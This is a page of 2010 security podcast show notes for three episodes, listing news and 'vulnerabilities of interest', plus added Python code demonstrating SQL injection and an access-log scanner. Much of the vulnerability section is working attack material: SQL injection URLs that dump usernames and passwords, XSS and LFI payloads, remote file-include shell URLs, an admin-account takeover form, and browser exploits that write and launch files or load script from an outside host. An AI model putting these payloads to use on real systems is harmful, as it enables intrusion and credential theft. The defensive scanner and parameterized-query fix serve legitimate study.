2010
03.31

InfoSec Daily Podcast

 
ISD Podcast Episode 99 for March 31, 2010. This podcast is our contribution back to the community, where we discuss vulnerabilities of interest and information security news, hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

  • MHDD Data Recovery Class current dates and locations:
    • Washington DC – April 12th to 16th
    • San Diego – May 10th-14th
    • San Francisco – June 14th -18th
    • Atlanta – July – 12th-16th
    • Chicago – September – 13th – 17th
    • Dallas, TX – October – 11th – 15th
    • Washington DC – December 6th – 10th
    • Cost is $3500 per class. To reserve and register, email smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

  • April 15th – 18th, 2010 Cleveland, Ohio
  • http://notacon.org/
  • Adrian will be there presenting on Anti-Forensics

Atlanta ISSA:
http://www.secureworldexpo.com/events/index.php?id=281
Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

    1. The WordPress My Category Order plugin (mycategoryorder.php) is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input before using it in a SQL query. Versions earlier than 2.8 are affected. Exploit URL is available (note the single quote appended to parentID): http://www.sample.com/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0'&idString=3,5,4,1
    2. AfterLogic WebMail Pro is subject to a Cross-Site Scripting vulnerability that allows script injection in the context of the application. Versions less than 4.7.10 are affected. The targeted user must be logged in to the webmail. The proof of concept below (the HistoryStorageObjectName value breaks out of a JavaScript string, so `alert('xss')` runs and `//` comments out the rest of the line) was successfully tested in Firefox 3.5 and Internet Explorer 8.
      <html>
      <head>
      </head>
      <body>
      <form method="post"
      action="http://WEBSITE/history-storage.aspx?param=0.21188772204998574"
      onSubmit="return false;">
      <input value="value"/>
      <input name="HistoryStorageObjectName" value="location;
      alert('xss'); //"/>
      </form>
      </body>
      </html>
      The vendor has released a patched version; update to AfterLogic WebMail Pro 4.7.11.
    3. DreamPoll is subject to multiple Cross-Site Scripting and SQL Injection vulnerabilities. These could be exploited to make unauthorized changes to a web site or to compromise a client accessing a site that uses the application. Versions less than 4.7.10 are affected. Example URLs are available (the first is a boolean test on sortField, the second a time-based test using sleep() with %23, a `#` comment, to discard the rest of the query): http://www.sample.com/index.php?action=login&sortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20

      http://www.sample.com/index.php?action=login&sortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20

    4. Docebo is subject to multiple SQL Injection vulnerabilities. Version 3.6.0.3 is affected. Google Dork: Powered by PHP Live! v3.2.1, Powered by PHP Live! v3.2.2 and allinurl:"request.php" "deptid". Example URLs are available. Note that the `word` parameter is base64-encoded before the application uses it, so the payload is not visible in the raw URL: the two values below decode to `' union select userid,pass from core_user -- ` and `' union select 1,userid,pass from core_user -- `. http://www.sample.com/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

      http://www.sample.com/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

      http://www.sample.com/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2

    5. Pepsi CMS (Irmin CMS) is subject to multiple Local File Inclusion (LFI) vulnerabilities. Version pepsi-0.6-BETA2 is affected. Example URLs are available (the second uses a trailing %00 NUL byte to truncate whatever suffix the application appends to the path): http://www.sample.com/PATH/index.php?w=[LFI%]

      http://www.sample.com/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00

    6. Joomla Component com_guide is subject to a SQL Injection vulnerability. Example URL is available: http://www.sample.com/index.php?option=com_guide&season=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
    7. PeaZip is subject to a division-by-zero denial of service vulnerability. Version 3.0 is affected, though others may be as well. To trigger it, open the application, click Tools, then Enter password / keyfile.
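Items 1, 3, 4 and 6 above all come down to the same defect: a request parameter is pasted into the SQL text, so a quote ends the intended value and a `UNION SELECT` appends the attacker's own query. The block below is an added example, not code from the podcast or from any of the affected products. It rebuilds that pattern against an in-memory SQLite database, decodes the base64 `word` value from the first Docebo URL to show what the server actually executes, walks the `UNION SELECT 1,2,3,...` column-count probe seen in the Joomla URL, and then shows the parameterized query that treats the same input as data. The `faq` table, its rows and the hash strings are constructed for the example; `core_user`, `userid` and `pass` are the names in the decoded Docebo payload. SQLite stands in for the MySQL backends the advisories target, so MySQL-only tricks such as `sleep()` or the `%23` comment are not reproduced.

```python
"""UNION-based SQL injection rebuilt against SQLite, with the parameterized fix.

Added example; not code from the podcast or from WordPress, DreamPoll, Docebo
or Joomla. Table rows and hashes below are constructed for the demo.
"""
import base64
import sqlite3
from typing import List, Tuple

# The base64 value of the `word` parameter from the first Docebo example URL above.
DOCEBO_WORD_B64 = "JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g"


def decode_word(b64: str) -> str:
    """Docebo base64-decodes `word` before using it, so the payload hides from a
    casual look at the URL; decoding shows the SQL fragment the server will see."""
    return base64.b64decode(b64).decode("ascii")


def build_db() -> sqlite3.Connection:
    """Constructed schema: a public FAQ table and a private user table
    (core_user / userid / pass are the names in the decoded Docebo payload)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE faq (id INTEGER PRIMARY KEY, question TEXT, answer TEXT);
        CREATE TABLE core_user (idst INTEGER PRIMARY KEY, userid TEXT, pass TEXT);
        INSERT INTO faq VALUES (1, 'How do I log in?', 'Use the login box.');
        INSERT INTO faq VALUES (2, 'How do I reset my password?', 'Ask an admin.');
        INSERT INTO core_user VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO core_user VALUES (2, 'jdoe', 'e10adc3949ba59abbe56e057f20f883e');
        """
    )
    return db


def search_faq_vulnerable(db: sqlite3.Connection, word: str) -> List[Tuple]:
    """The defect behind every SQLi item above: the parameter is spliced into the
    statement text, so a quote ends the literal and everything after it is SQL."""
    sql = f"SELECT question, answer FROM faq WHERE question LIKE '%{word}%'"
    return db.execute(sql).fetchall()


def search_faq_fixed(db: sqlite3.Connection, word: str) -> List[Tuple]:
    """Same query with a bound parameter: the value travels separately from the
    statement and can never change its shape."""
    sql = "SELECT question, answer FROM faq WHERE question LIKE '%' || ? || '%'"
    return db.execute(sql, (word,)).fetchall()


def find_column_count(db: sqlite3.Connection, max_cols: int = 12) -> int:
    """The `-1 UNION SELECT 1,2,3,...` probe from the Joomla URL: a UNION is only
    accepted when both SELECTs return the same number of columns, so the first
    count that does not raise an error is the one the original query uses."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            search_faq_vulnerable(db, f"' UNION SELECT {cols} -- ")
            return n
        except sqlite3.OperationalError:
            continue  # column-count mismatch; try one more column
    raise RuntimeError("no column count up to %d matched" % max_cols)


def exfiltrate_users(db: sqlite3.Connection) -> List[Tuple]:
    """Run the decoded Docebo payload through the vulnerable search. Its two
    columns (userid, pass) line up with (question, answer), so credentials come
    back in the rows where FAQ entries belong."""
    return search_faq_vulnerable(db, decode_word(DOCEBO_WORD_B64))


if __name__ == "__main__":
    db = build_db()
    print("payload :", decode_word(DOCEBO_WORD_B64))
    print("columns :", find_column_count(db))
    for row in exfiltrate_users(db):
        print("leaked  :", row)
    print("fixed   :", search_faq_fixed(db, decode_word(DOCEBO_WORD_B64)))
```

Run it directly to see the four rows the injected query returns (two FAQ entries followed by two username/hash pairs). The comparison that matters is that `search_faq_fixed` receives the identical string and returns nothing, because the driver never lets the value touch the statement.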

Stories of Interest:
News item 1:http://fcw.com/articles/2010/03/24/fose-cloud-computing-not-always-helpful-in-data-recovery.aspx
Newer technologies such as cloud computing can be a boon for post-disaster recovery of data, but they don’t always help much, Dennis Heretick, former chief information security officer for the Justice Department, said at a FOSE trade show session today.

“Cloud computing can provide more reliability, but that should not be assumed,” Heretick said. How a specific cloud application fits within an agency’s or company’s disaster recovery strategy should be assessed by each organization individually, he added.

Overall, in the last five years, disaster recovery and business continuity planning have become easier and less costly because of the availability of automated electronic storage processes for critical data, Heretick said.

Even so, there are hurdles to overcome in developing and implementing a disaster recovery plan and process. Some of the main obstacles include the difficulty of obtaining management support for disaster recovery goals and identifying and obtaining support for roles for individuals to perform in executing the plan, Heretick said.

News item 2:http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=224200279
Seventy-seven percent of C-level executives in a 115-person survey conducted in the U.K. say their organization has experienced a data breach at some point and all of them report attacks targeting corporate data in the past 12 months.

These findings come from a study released on Wednesday by IBM, a company that sells data protection services, and The Ponemon Institute, a privacy and information management research organization.

Larry Ponemon, founder of the group that bears his name, said that survey shows a shift in the way C-level executives think about security software. Investing in data protection, he said, is now seen as less expensive than recovering from a data breach.

Data protection initiatives on average, according to the survey, result in a cost savings or revenue improvement of £11 million ($16 million) for organizations.

2010
03.30

InfoSec Daily Podcast

 
ISD Podcast Episode 98 for March 30, 2010. This podcast is our contribution back to the community, where we discuss vulnerabilities of interest and information security news, hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

  • MHDD Data Recovery Class current dates and locations:
    • Washington DC – April 12th to 16th
    • San Diego – May 10th-14th
    • San Francisco – June 14th -18th
    • Atlanta – July – 12th-16th
    • Chicago – September – 13th – 17th
    • Dallas, TX – October – 11th – 15th
    • Washington DC – December 6th – 10th
    • Cost is $3500 per class. To reserve and register, email smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

  • April 15th – 18th, 2010 Cleveland, Ohio
  • http://notacon.org/
  • Adrian will be there presenting on Anti-Forensics

Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

    1. Simple Machines Forum is subject to a remote PHP file execution vulnerability via the avatar field. An attacker sets an avatar URL that points at a PHP file on a server they control; every visitor's browser then fetches that file when the avatar is displayed, so the attacker's script runs for each visitor and can record details about them. What the attack achieves depends entirely on what the PHP file does. Version 1.1.8 is affected, though others may be as well. Proof of concept is available (it appends the visitor's IP, user agent and language to a log file on the attacker's server):
      <?php
      // Logs details of every forum visitor whose browser fetches this file as an avatar.
      $ip   = $_SERVER['REMOTE_ADDR'];
      $so   = $_SERVER['HTTP_USER_AGENT'];
      $lan  = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
      $url  = $_SERVER['PHP_SELF'];
      $path = $_SERVER['DOCUMENT_ROOT'];
      $archivo = 'hacks.txt';
      $fp = fopen($archivo, "a");
      $string = "
      Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC
      by Jose Luis Gongora Fernandez (aka) JosS

      $path$url

      VICTIM: $ip

      info: $so
      language: $lan

      ";
      $write = fputs($fp, $string);
      fclose($fp);
      ?>

    2. Joomla Component dcsFlashGames is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Version 2.0RC1 is affected. Example URL is available:  http://www.sample.com/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&;catid=[INDONESIANCODER]
    3. Joomla Component com_solution is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_solution&Itemid=5&task=contry&con=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
    4. Joomla Component com_units is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_units&task=unit&id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
    5. Joomla Component com_tariff is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_tariff&detail=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11
    6. Joomla Component com_agency is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_agency&task=view&aid=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
    7. Joomla Component com_adds is subject to a Blind SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2--
    8. Joomla Component com_departments is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_departments&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
    9. Joomla Component com_business is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,3--
    10. Joomla Component com_radio is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
    11. Comersus 7F Shopping Cart (ASP) is subject to a database disclosure vulnerability: the Access database comersus.mdb sits under the web root and, by default, is not password-protected. It contains order information (buyer's address, phone, order status, tracking number, obs, etc.), settings (encryption password, admin e-mail, company information, etc.) and shipment data. Exploit URL is available:  http://www.sample.com/Comersus/database/comersus.mdb
    12. Powie's PSCRIPT Gästebuch is subject to a SQL Injection vulnerability. All versions earlier than 2.09 are affected. Exploit URL is available: http://www.sample.com/gb/kommentar.php?id=99999+union+select+1,2,3,4,5,concat(nickname,0x3a,pwd,0x3a,email),7,8,9,10,11,12,13+from+pfuser+where+id=2
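The Joomla items above, the Comersus database download, and the DreamPoll, Docebo and Pepsi CMS URLs from episode 99 all leave a distinctive trace in an ordinary web-server access log, and the episode 97 notes further down this page add remote file inclusion URLs of the same shape. The scanner below is an added example, not code from the podcast or from any of these products. It parses the request line of combined-format log entries, URL-decodes each query parameter, tries a base64 decode on parameters that look encoded (the way Docebo's `word` is) and re-checks the result, and matches a few narrow signatures for UNION-based and time-based SQL injection, directory traversal with NUL-byte truncation, remote includes, and direct requests for `.mdb` files. The log lines are constructed to mirror the example URLs on this page, with invented client addresses, timestamps and remote host; the signatures are a starting point for a detection rule, not a WAF.

```python
"""Flag the injection, inclusion and backup-download requests from these show
notes in a web-server access log.

Added example, not code from the podcast or from any product it covers. The
SAMPLE_LOG lines are constructed to match the example URLs on this page.
"""
import base64
import binascii
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Request field of an Apache/nginx combined-format line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')
# Parameter values that could be base64 (Docebo hides its SQL this way)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

SIGNATURES = {
    # UNION probes, time-based blind (sleep), tautologies, trailing comments, hex literals
    "sqli": re.compile(
        r"union\s+select|\bsleep\s*\(|'\s*(?:and|or)\b|\b(?:and|or)\s+\d+\s*[-=+]|--\s*$|#$|0x[0-9a-f]{2,}",
        re.I,
    ),
    # traversal, NUL-byte truncation (%00 after decoding), classic target files
    "lfi": re.compile(r"\.\./|\x00|/etc/passwd|boot\.ini", re.I),
    # remote include: absolute URL in a parameter, or the trailing '?' trick that turns an appended suffix into a query string
    "rfi": re.compile(r"^(?:https?|ftp)://|\.txt\?$", re.I),
}


def _decode_base64(value: str):
    """Decoded text when `value` is valid base64 for printable ASCII, else None."""
    if not B64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, ValueError):
        return None
    return text if text.isprintable() else None


def scan_request(target: str) -> List[str]:
    """Inspect one request target; findings are 'kind:parameter' strings."""
    findings: List[str] = []
    parts = urlsplit(target)
    # Direct download of an Access database, as with comersus.mdb
    if parts.path.lower().endswith(".mdb"):
        findings.append("backup-dump:path")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for kind, rx in SIGNATURES.items():
            if rx.search(value):
                findings.append(f"{kind}:{name}")
        decoded = _decode_base64(value)
        if decoded is not None:  # look inside encoded parameters too
            for kind, rx in SIGNATURES.items():
                if rx.search(decoded):
                    findings.append(f"{kind}(base64):{name}")
    return findings


def scan_line(line: str) -> List[str]:
    m = REQUEST_RE.search(line)
    return scan_request(m.group(1)) if m else []


def scan_log(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """(1-based line number, findings) for every line that trips a signature."""
    return [(i, f) for i, line in enumerate(lines, 1) if (f := scan_line(line))]


# Constructed log lines (invented client, timestamps and remote host) mirroring this page's example URLs
_PFX = '203.0.113.5 - - [30/Mar/2010:10:15:%02d +0000] "GET %s HTTP/1.1" 200 512'
SAMPLE_LOG = [
    _PFX % (1, "/index.php?option=com_content&view=article&id=42"),  # benign
    _PFX % (2, "/index.php?option=com_units&task=unit&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8--"),
    _PFX % (3, "/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g"),
    _PFX % (4, "/index.php?action=login&sortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20"),
    _PFX % (5, "/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00"),
    _PFX % (6, "/Comersus/database/comersus.mdb"),
    _PFX % (7, "/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://203.0.113.9/shell.txt"),
]

if __name__ == "__main__":
    for lineno, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(findings)}")
```

Feed real log lines in place of `SAMPLE_LOG` to try it on your own traffic. The base64 step is what catches the Docebo request: the raw `word` value trips nothing, and only the decoded text contains `union select`, which is exactly why encoded parameters need decoding before signature matching.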

Stories of Interest:
News item 1: http://www.theregister.co.uk/2010/03/29/ie_emergency_fix/
Microsoft has announced plans to release an out-of-sequence patch, designed to resolve a zero-day vulnerability in Internet Explorer.

A cumulative update to Internet Explorer (MS10-018) plugs a security hole in IE 6 and IE 7 exploited by hackers over recent weeks. The latest version of Microsoft’s browser – IE 8 – is not vulnerable to the flaw, which Microsoft first acknowledged was a problem on 9 March.

The vulnerability involves a flaw in the iepeers.dll library involving the handling of invalid values passed to the “setAttribute()” function. Exploits create a means to drop malware onto the PCs of victims, provided they visit a booby-trapped website using a vulnerable version of IE.

News item 2: http://www.computerworld.com/s/article/9174337/Apple_delivers_record_monster_security_update?taxonomyId=17
Apple today patched 92 vulnerabilities, a third of them critical, in a record update to its Leopard and Snow Leopard operating systems.

Security Update 2010-002 plugged 92 holes in the client and server editions of Mac OS X 10.5 and Mac OS X 10.6, breaking a record that has stood since March 2008. The update dwarfed any released last year, when Apple’s largest patched 67 vulnerabilities.

Today’s security roll-up fixed flaws in 42 different applications or operating system components in Mac OS X, from AppKit and Application Firewall to unzip and X11, the Mac’s version of the X Window System.

News item 3: http://fcw.com/articles/2010/03/23/web-fose-bratton-lapd-cyber.aspx
Local police departments have the knowledge but lack the resources for cybersecurity-related police efforts, according to former Los Angeles Police Department Chief Bill Bratton.

Speaking as the keynote address at the FOSE 2010 trade show in Washington, Bratton said local police departments have been behind the curve for most of their history in tackling computer-related crime and cybersecurity.

Bratton, who also served as commissioner of the New York City Police Department, also said that computer security is an unmet challenge for police departments that is unlikely to be addressed in significant way because of funding, prioritization, resources and access to systems.

He added that the situation is frustrating for police chiefs. “We know how to do it; we know how to coordinate it,” he said. “It’s a resource issue.” Bratton is now chairman of Altegrity Risk International. He also previously served as chief of the New York City Transit Police and as Boston Police Department commissioner.

News item 4: http://www.ottawacitizen.com/technology/Canada+easy+prey+cyber+attacker+expert/2718450/story.html
Canada is woefully unprepared for a massive cyber-attack that is within the capabilities of any run-of-the-mill hacker, and which could cripple the business of the nation, warns a leading security expert.

Dragos Ruiu, an Edmonton-based computer security consultant, says it’s time for the government to protect complex computer networks that can now be hijacked with the simplest of tools.

“There has got to be a lot more thought and a lot more talk and a lot more brains applied to the situation,” said Ruiu. “The cyber-warfare world is the only place a 17-year-old kid can take on a nation-state and win.”

Ruiu, a key organizer of the CanSecWest Applied Security Conference in Vancouver, said that when it comes to computer security, even the popular pocket-sized smartphones are open to attack. He said this year’s conference will play host to a hacking contest to see which cellphone is the most secure.

News item 5:  http://news.bbc.co.uk/2/hi/europe/8586269.stm
A Frenchman who police say hacked Twitter accounts belonging to US President Barack Obama and celebrities could face jail. The unemployed 25-year-old was arrested on Tuesday after an operation lasting several months, conducted by French police with agents from the FBI.  The 25-year-old is said to have hacked into the micro-blogging website, by simply guessing users’ passwords.

The suspect reportedly targeted other celebrities, including Britney Spears. After being questioned by police, he was ordered to appear at court in the central French city of Clermont-Ferrand on 24 June.

2010
03.29

InfoSec Daily Podcast

 
ISD Podcast Episode 97 for March 29, 2010. This podcast is our contribution back to the community, where we discuss vulnerabilities of interest and information security news, hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

  • April 15th – 18th, 2010 Cleveland, Ohio
  • http://notacon.org/
  • Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class

  • May 8, 2010 Jeffersonville,  Indiana
  • (No URL for that as of yet)
  • Proceeds will go to the Hackers for Charity Food For Work Program

Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

    1. Pc4Uploader is subject to a Local File Include (LFI) vulnerability. Versions 9.0 to 10.0 are affected. Proof-of-concept URL is available (the %00 NUL byte truncates any suffix the application appends): http://www.sample.com/up/index.php?PHPSESSID=2e970d2361293815462ffaa028135c23;tempst=../../../../../../../../boot.ini%00
    2. AdaptCMS Lite 1.5 is subject to a vulnerability that allows the admin account's username and password to be changed and a new admin-level user to be added. Version 1.5 (2009-07-07) is affected. Exploit code is available; it posts attacker-chosen credentials and a Level of Admin to the edit_users2 action for user id 1:
      <html>
      <head>
      </head>
      <body>
      <h2>coded by ahmadbady</h2>
      <!-- Submits to the user-edit action for user id 1 (the admin account) on the target -->
      <form action='admin.php?view=edit_users2&id=1' method='post'>
      <table cellpadding='5' cellspacing='0' border='0' width='480' style='padding-left:5px' align='left'>
      <tr><td>Username</td><td>
      <input type='text' name='username1' size='16' value='anything' style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'>
      </td></tr>
      <tr><td>New Password?</td><td>
      <input type='text' name='password1' size='16' style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'>
      </td></tr>
      <tr><td>E-Mail</td><td>
      <input type='text' name='email1' size='16' value='anything' style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'>
      </td></tr>
      <tr><td>Level</td><td>
      <select name='level' style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'>
      <option value='Admin' selected>Admin - Level 1</option>
      <option value='Member'>Member - Level 3</option>
      <option value='Staff'>Staff - Level 2</option>
      </select>
      </td></tr>
      <tr><td>
      <input type='submit' value='Update User' style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'>
      </td></tr>
      </table>
      </form>
      </body>
      </html>
    3. 68kb is subject to multiple Remote File Include (RFI) vulnerabilities. Version 1.0.0rc2 is affected. Example URLs are available (the trailing `?` turns anything the script appends to the file name into a query string on the attacker's server):

      http://www.sample.com/themes/front/default/modules/show.php?file=shell.txt?

      http://www.sample.com/themes/admin/default/modules/show.php?file=shell.txt?

    4. Netscape Navigator, the Namoroka web browser and the Flock browser are subject to a URL code execution vulnerability: a `view-source:javascript:` URL in a favicon `<link>` injected into the page runs with chrome privileges (via `enablePrivilege('UniversalXPConnect')`) and can write and launch files. Version 9.0.0.6 of Netscape Navigator is affected. Exploit code is available (it writes and runs c:\mampus.bat on Windows, or writes ~/mampus.txt on Linux):
      <html>
      <head>
      <title>firelinking By eidelweiss</title>

      <!-- Copyright (C) 2009-2010 firelinking by eidelweiss -->
      <!-- Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u) , and all my friends -->
      <!-- This PoC is cross platform : On Windows this example creates the file -->
      <!-- c:\mampus.bat and launches it (opens a dos box with a dir command). On -->
      <!-- Linux (tested Fedora Core) the example creates the file -->
      <!-- ~/mampus.txt Depending on caching the script might -->
      <!-- run twice in some cases (this will create an additional mampus-1.txt). -->

      <link rel="SHORTCUT ICON" href="favicon.ico">
      <script language="JavaScript" type="text/javascript">
      var pf = navigator.platform.toLowerCase();
      if (pf.indexOf("win") != -1) {
      var os = "win";
      } else if (pf.indexOf("linux") != -1) {
      var os = "linux";
      }
      function GoFuck() {
      // this is a bad caching workaround inside
      document.getElementById('outhtml').innerHTML = "";
      document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
      document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
      document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
      // after a short delay, inject the platform-specific favicon link carrying the javascript: URL
      window.setTimeout("document.getElementById('outhtml').innerHTML += document.getElementById('linkhtml_"+os+"').value",300);
      }
      </script>
      </head>
      <body>
      <div style="font-family:Verdana;font-size:11px;">

      <div style="font-family:Verdana;font-size:15px;font-weight:bold;">firelinking By eidelweiss</div>
      <br><br>
      <div style="width:600px">
      <!-- the ids outhtml, clearhtml and linkhtml_linux were lost in transcription and are restored here to match the getElementById() calls in the script -->
      <div id="outhtml" style="display:none"></div>

      <textarea id="clearhtml" style="display:none">
      <link rel="SHORTCUT ICON" href="favicon.ico">
      </textarea>

      <textarea id="linkhtml_win" style="display:none">
      <link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\'c:\\\\mampus.bat\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch();','','')">
      </textarea>

      <textarea id="linkhtml_linux" style="display:none">
      <link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\'~/mampus.txt\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output=\'mampus!\';outputStream.write(output,output.length);outputStream.close();','','')">
      </textarea>
      <br><br>
      <!-- the onclick handler was also lost in transcription; GoFuck() above is the only entry point -->
      <a href="#" onclick="GoFuck()">Run exploit</a>
      </div>
      </div>
      </body>
      </html>

    5. Apple Safari is subject to a history search vulnerability; a code-execution exploit PoC is available. The `safari:historysearch` URL carries an `<img>` whose error handler decodes and runs the String.fromCharCode payload, which (decoded) is `q=document.createElement("SCRIPT");q.src="http://www.raffon.net/research/opera/history/o.js";document.body.appendChild(q);`:
      <!--
      Copyright (C) 2009-2010 firelinking by eidelweiss
      Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u)
      Credit: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , YOGYACARDERLINK
      This P0C made for Educational Purpose only
      Author Will Be not responsible For Any Damage.
      -->

      <html>
      <script>
      function Dick() {
      // fromCharCode payload decodes to: q=document.createElement("SCRIPT");q.src="http://www.raffon.net/research/opera/history/o.js";document.body.appendChild(q);
      window.open('safari:historysearch?q=%2A"><img src=\'Dick\' Dickonerror=\'evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1');
      window.setTimeout("location.href='mailto:'",6666);
      }
      </script>
      <body scrolling="no">
      <!-- the onclick handler was lost in transcription; Dick() above is the only entry point -->
      <a href="#" onclick="Dick()">Suck Please...</a>
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
